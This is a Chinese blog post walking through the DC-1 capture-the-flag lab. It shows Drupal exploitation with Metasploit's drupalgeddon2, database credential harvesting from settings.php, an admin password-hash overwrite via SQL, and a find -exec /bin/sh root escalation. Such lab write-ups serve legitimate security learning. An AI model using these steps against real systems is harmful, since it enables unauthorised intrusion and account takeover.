Neos的渗透测试靶机练习——DC-1

简介: Neos的渗透测试靶机练习——DC-1

DC-1
一、实验环境
二、开始渗透

  1. 搜集信息
  2. flag1(CMS版本漏洞)
  3. flag2(CMS配置文件)
  4. flag3(数据库信息)
  5. flag4(靶机用户信息)
  6. flag5(find提权)
    三、总结(心里话(maybe quantui?))
    一、实验环境
    虚拟机软件:VirtualBox
    攻击机:kali linux(网卡初始为仅主机模式,要有安全意识)
    靶机:DC-1(网卡初始为仅主机模式,要有安全意识)
    1
    2
    3
    二、开始渗透
  7. 搜集信息
    输入sudo su,将kali切换到root权限;

输入ifconfig查询自身ip,即攻击机ip;

可以看到自身ip为192.168.56.101。
输入arp-scan -l扫描本网段存活主机,即靶机ip地址。

可以看到靶机ip为192.168.56.102,那192.168.56.100是什么呢?自己想一下。
输入nmap -p- 192.168.56.102扫描靶机所有端口开放情况。

可以看到端口22、80、111、45433是开放的。
尽量不爆破,实际渗透环境中有可能锁ip。
知道http服务是开的,打开浏览器输入192.168.56.102:80大致看一下界面。
命令行输入whatweb -v 192.168.56.102查询网站信息。

可以看到一些关键信息,其中Drupal是一个内容管理系统(CMS)。

  1. flag1(CMS版本漏洞)
    查查有没有版本漏洞,命令行输入msfconsole打开Metasploit
    1

输入search Drupal,查询出了一些版本漏洞,优先使用针对time最近且rank最高的漏洞的exp,即对应exploit/unix/webapp/drupal_drupalgeddon2这个漏洞的exp。

输入use exploit/unix/webapp/drupal_drupalgeddon2,

在metasploit中输入 set RHOSTS 192.168.56.102(靶机ip),
以及set LHOSTS 192.168.56.101(kali系统ip)

开始润,得到shell。

先输入shell,再输入ls,得到flag1.txt,输入cat flag1.txt查看

  1. flag2(CMS配置文件)
    由于这是一个CMS,可以找它的配置文件看一看。
    发现靶机上有python,先输入python -c 'imoprt pty; pty.spawn("/bin/bash")'转成交互式shell,方便操作。
    1
    2

找到Drupal的配置文件在/var/www/sites/defualt/settings.php,查看后获获得flag2.txt。

其中发现数据库信息。

  1. flag3(数据库信息)
    由上图,得知database,username, password。
    输入mysql -udbuser -pR0ck3t登录数据库。
    1
    2

输入show databases;查看有哪些数据库,

通过输入use drupaldb;切换到drupaldb,然后输入show tables;查看表名,发现users。

select*后发现比较乱乱,不过有属性名name和pass,
故输入select name,pass from users;,发现user和password。

密码经过加密,秉持攻击机靶机能不连公网就不连的原则,在本地上网查到drupal的密码修改方法。
cd /var/www后,执行./script/password-hash.sh drneos得到drneos的加密形式。

保存后面的hash字符串,再次进入mysql的drupaldb数据库,修改admin的密码,输入
update user set pass = '$S$DbGB6f5y0ESQdtMn1R61MBNKgHkQTaY5VSmOn41SLbCCek1IPE8M' where uid = 1;

至此,可以登录网站了。
在网站中输入用户名admin,密码deneos,进入drupal。

在Dashboard板块中发现flag3,点击得到flag3内容。

  1. flag4(靶机用户信息)
    命令行输入cat /etc/passwd查看用户信息,发现flag4。

本着能不爆破就不爆破的想法,找啊找,发现了flag4.txt

  1. flag5(find提权)
    最后阶段了,往往都是要提权,这里用find命令。
    输入find flag1.txt -exec "/bin/sh" \;拿到root权限。

进入/root目录,发现最终flag!。

至此,渗透结束。

三、总结(心里话(maybe quantui?))
经过上述的渗透过程,大家应该或多或少有一些想法,如果没有那些现成的工具(metasploit,whatweb,arp-scan等等),你怎么办?如果给你一个纯净的windows系统,什么软件也没有,然后再给你靶机让你去渗透,你能拿下它吗?你能短时间拿下吗?
说实话,我认为最精髓的不是如何熟练使用那些现有的工具,而是自己有那种根据渗透时不同阶段的需求去独立编写出扫描脚本和漏洞利用代码的能力。倘若你发现了漏洞,没有别人现成的脚本、exp,你怎么拿shell?怎么提权?自己开发?你有那个能力吗?越到后面与需要你的开发能力。
第一步是当好脚本小子,学习基本的渗透思路,工具看见一个积累一个,慢慢的,你会发现你越来越强。
最后,其实在实际环境中,社会工程学(钓鱼)和暴力破解(硬上)是最快最有效的,当我意识到这个现象的时候,说实话我的网安心有些动摇。
————————————————

                        版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

原文链接:https://blog.csdn.net/qq_38678845/article/details/135279582

目录
相关文章
|
1月前
|
安全 Linux 网络安全
Neos的渗透测试靶机练习——DC-3
Neos的渗透测试靶机练习——DC-3
31 4
|
1月前
|
Devops Shell 网络安全
Neos的渗透测试靶机练习——Wakanda
Neos的渗透测试靶机练习——Wakanda
21 2
|
1月前
|
安全 Shell 网络安全
DC-2靶机上了解和练习WordPress框架
本文介绍了在一个名为DC2的虚拟环境中进行渗透测试的过程。首先通过扫描发现SSH和Web端口,并进行全端口扫描以寻找隐藏端口。接着通过信息收集、漏洞利用(如SQL注入、文件上传漏洞等)、反弹Shell及提权等步骤逐步攻陷目标系统。文章详细描述了使用Cewl生成字典、Dirsearch扫描目录、Wpscan枚举WordPress用户等技巧,并最终通过SSH登录和Git命令实现了提权,获取多个flag。
|
2月前
|
安全 中间件 Shell
渗透测试-靶机DC-2-知识点总结
渗透测试-靶机DC-2-知识点总结
36 0
|
10天前
|
JSON Java 测试技术
SpringCloud2023实战之接口服务测试工具SpringBootTest
SpringBootTest同时集成了JUnit Jupiter、AssertJ、Hamcrest测试辅助库,使得更容易编写但愿测试代码。
42 3
|
1月前
|
JSON 算法 数据可视化
测试专项笔记(一): 通过算法能力接口返回的检测结果完成相关指标的计算(目标检测)
这篇文章是关于如何通过算法接口返回的目标检测结果来计算性能指标的笔记。它涵盖了任务描述、指标分析(包括TP、FP、FN、TN、精准率和召回率),接口处理,数据集处理,以及如何使用实用工具进行文件操作和数据可视化。文章还提供了一些Python代码示例,用于处理图像文件、转换数据格式以及计算目标检测的性能指标。
63 0
测试专项笔记(一): 通过算法能力接口返回的检测结果完成相关指标的计算(目标检测)
|
2月前
|
移动开发 JSON Java
Jmeter实现WebSocket协议的接口测试方法
WebSocket协议是HTML5的一种新协议,实现了浏览器与服务器之间的全双工通信。通过简单的握手动作,双方可直接传输数据。其优势包括极小的头部开销和服务器推送功能。使用JMeter进行WebSocket接口和性能测试时,需安装特定插件并配置相关参数,如服务器地址、端口号等,还可通过CSV文件实现参数化,以满足不同测试需求。
242 7
Jmeter实现WebSocket协议的接口测试方法
|
2月前
|
JSON 移动开发 监控
快速上手|HTTP 接口功能自动化测试
HTTP接口功能测试对于确保Web应用和H5应用的数据正确性至关重要。这类测试主要针对后台HTTP接口,通过构造不同参数输入值并获取JSON格式的输出结果来进行验证。HTTP协议基于TCP连接,包括请求与响应模式。请求由请求行、消息报头和请求正文组成,响应则包含状态行、消息报头及响应正文。常用的请求方法有GET、POST等,而响应状态码如2xx代表成功。测试过程使用Python语言和pycurl模块调用接口,并通过断言机制比对实际与预期结果,确保功能正确性。
252 3
快速上手|HTTP 接口功能自动化测试
|
2月前
|
JavaScript 前端开发 测试技术
ChatGPT与接口测试
ChatGPT与接口测试,测试通过
49 5
|
1月前
|
JavaScript 前端开发 API
vue尚品汇商城项目-day02【9.Home组件拆分+10.postman测试接口】
vue尚品汇商城项目-day02【9.Home组件拆分+10.postman测试接口】
40 0